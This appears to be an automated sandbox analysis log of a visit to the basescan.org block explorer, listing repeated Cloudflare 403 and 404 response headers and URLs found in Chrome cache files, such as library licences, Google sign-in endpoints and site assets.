            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 28 Sep 2024 01:16:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closex-frame-options: SAMEORIGINx-xss-protection: 0x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonereferrer-policy: strict-origin-when-cross-origincache-control: no-cachex-request-id: 4534d5a7-5d7b-401c-86be-26a570c7dd4dx-runtime: 0.011459vary: Accept, Originvia: 1.1 fly.iofly-request-id: 01J8V375EZ07CGYC9187WMNE4F-lgaCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6WVT6psw3m59jLYoYIFR4LCPITHDcvsSKlg2HKOnu6FLJSrtGRphzm3STdgb1FBAexDeB8egG7zkV1HB1CY%2Fi2ZZ5cpB%2FQKiQBSDuUqmJ%2BrMAQr2C8eqtyPIpIn2wN9An38%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Speculation-Rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 8c9fe3c2ed79c44a-EWR
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 28 Sep 2024 01:16:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closex-frame-options: SAMEORIGINx-xss-protection: 0x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonereferrer-policy: strict-origin-when-cross-origincache-control: no-cachex-request-id: aa7ef7fc-7006-48ad-9595-8caf3253a5dex-runtime: 0.009390vary: Accept, Originvia: 1.1 fly.iofly-request-id: 01J8V376PFVQ169KWXZ99WZQ2W-lgaCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W7mgZrSPmwv0h%2BnU9w3%2Bmq9dCpM14GZFwGQMy%2BN66ED4mhzveGRQsLq4PwZa%2B%2FCPLchMj2DWjuuk7U8XPF68PgTwudphNHi46esQTKEEYB9FE3NcIwC%2FQLL9gXzX69ZHTPA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Speculation-Rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 8c9fe3cace3b78e7-EWR
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:16:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 9904Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:16:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 9909Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:16:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 10076Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:16:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 9925Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:16:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 9908Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:16:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 10119Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:16:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 9909Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:16:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 9904Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:16:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 10119Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:17:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 9930Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:17:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 9926Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:17:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 10097Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:17:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 10037Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:17:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 10053Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 28 Sep 2024 01:17:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 10247Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
            Source: chromecache_345.2.drString found in binary or memory: http://api.basescan.org/api?module=contract&amp;action=getabi&amp;address=0x28a5e71bfc02723eac17e39c
            Source: chromecache_685.2.dr, chromecache_915.2.drString found in binary or memory: http://codecanyon.net/licenses)
            Source: chromecache_806.2.drString found in binary or memory: http://daneden.me/animate
            Source: chromecache_486.2.dr, chromecache_682.2.drString found in binary or memory: http://eas.etherscan.com/d3d3/ZGVsaXZlcnk/YXN5bmNzcGM=.php
            Source: chromecache_432.2.dr, chromecache_477.2.drString found in binary or memory: http://fancyapps.com/fancybox/
            Source: chromecache_975.2.dr, chromecache_317.2.drString found in binary or memory: http://jqueryui.com
            Source: chromecache_742.2.dr, chromecache_974.2.drString found in binary or memory: http://kjur.github.io/jsrsasign/license/
            Source: chromecache_664.2.dr, chromecache_668.2.drString found in binary or memory: http://opensource.org/licenses/BSD-3-Clause
            Source: chromecache_806.2.drString found in binary or memory: http://opensource.org/licenses/MIT
            Source: chromecache_711.2.dr, chromecache_448.2.drString found in binary or memory: http://opensource.org/licenses/MIT).
            Source: chromecache_685.2.dr, chromecache_915.2.drString found in binary or memory: http://scriptpie.com/cubeportfolio/live-preview/)
            Source: chromecache_883.2.dr, chromecache_385.2.drString found in binary or memory: http://underscorejs.org/LICENSE
            Source: chromecache_919.2.dr, chromecache_410.2.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: chromecache_508.2.dr, chromecache_542.2.drString found in binary or memory: https://accounts.google.com/gsi/
            Source: chromecache_508.2.dr, chromecache_542.2.drString found in binary or memory: https://accounts.google.com/gsi/button
            Source: chromecache_508.2.dr, chromecache_542.2.drString found in binary or memory: https://accounts.google.com/gsi/fedcm.json
            Source: chromecache_508.2.dr, chromecache_542.2.drString found in binary or memory: https://accounts.google.com/gsi/fedcmcsp?client_id=
            Source: chromecache_508.2.dr, chromecache_542.2.drString found in binary or memory: https://accounts.google.com/gsi/iframe/select
            Source: chromecache_542.2.drString found in binary or memory: https://accounts.google.com/gsi/log
            Source: chromecache_508.2.dr, chromecache_542.2.drString found in binary or memory: https://accounts.google.com/gsi/revoke
            Source: chromecache_508.2.dr, chromecache_542.2.drString found in binary or memory: https://accounts.google.com/gsi/select
            Source: chromecache_508.2.dr, chromecache_542.2.drString found in binary or memory: https://accounts.google.com/gsi/status
            Source: chromecache_508.2.dr, chromecache_542.2.drString found in binary or memory: https://accounts.google.com/gsi/style
            Source: chromecache_508.2.dr, chromecache_542.2.drString found in binary or memory: https://accounts.google.com/o/oauth2/iframe
            Source: chromecache_542.2.drString found in binary or memory: https://accounts.google.com/o/oauth2/v2/auth
            Source: chromecache_737.2.drString found in binary or memory: https://adservice.google.com/pagead/regclk?
            Source: chromecache_345.2.drString found in binary or memory: https://api.basescan.org/api?module=contract&amp;action=getabi&amp;address=0x28a5e71bfc02723eac17e39
            Source: chromecache_345.2.drString found in binary or memory: https://api.hypelab.com/v1/scripts/hp-sdk.js?v=0
            Source: chromecache_444.2.drString found in binary or memory: https://apps.apple.com/app/apple-store/id1288339409
            Source: chromecache_444.2.drString found in binary or memory: https://apps.apple.com/us/app/metamask/id1438144202
            Source: chromecache_444.2.drString found in binary or memory: https://apps.apple.com/us/app/okx-buy-bitcoin-eth-crypto/id1327268470
            Source: chromecache_883.2.dr, chromecache_385.2.drString found in binary or memory: https://avatars.githubusercontent.com/u/37784886
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/css/custom.css?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/css/theme.min.css?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/highcharts/js/v6/highcharts.js?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/js/components/hs.clipboard.js?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/js/components/hs.cubeportfolio.js?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/js/components/hs.focus-state.js?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/js/components/hs.go-to.js?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/js/components/hs.header.js?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/js/components/hs.malihu-scrollbar.js?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/js/components/hs.unfold.js?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/js/custom/combine-js-bottom2.js?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/js/custom/commonjs.js?v=24.4.4.9
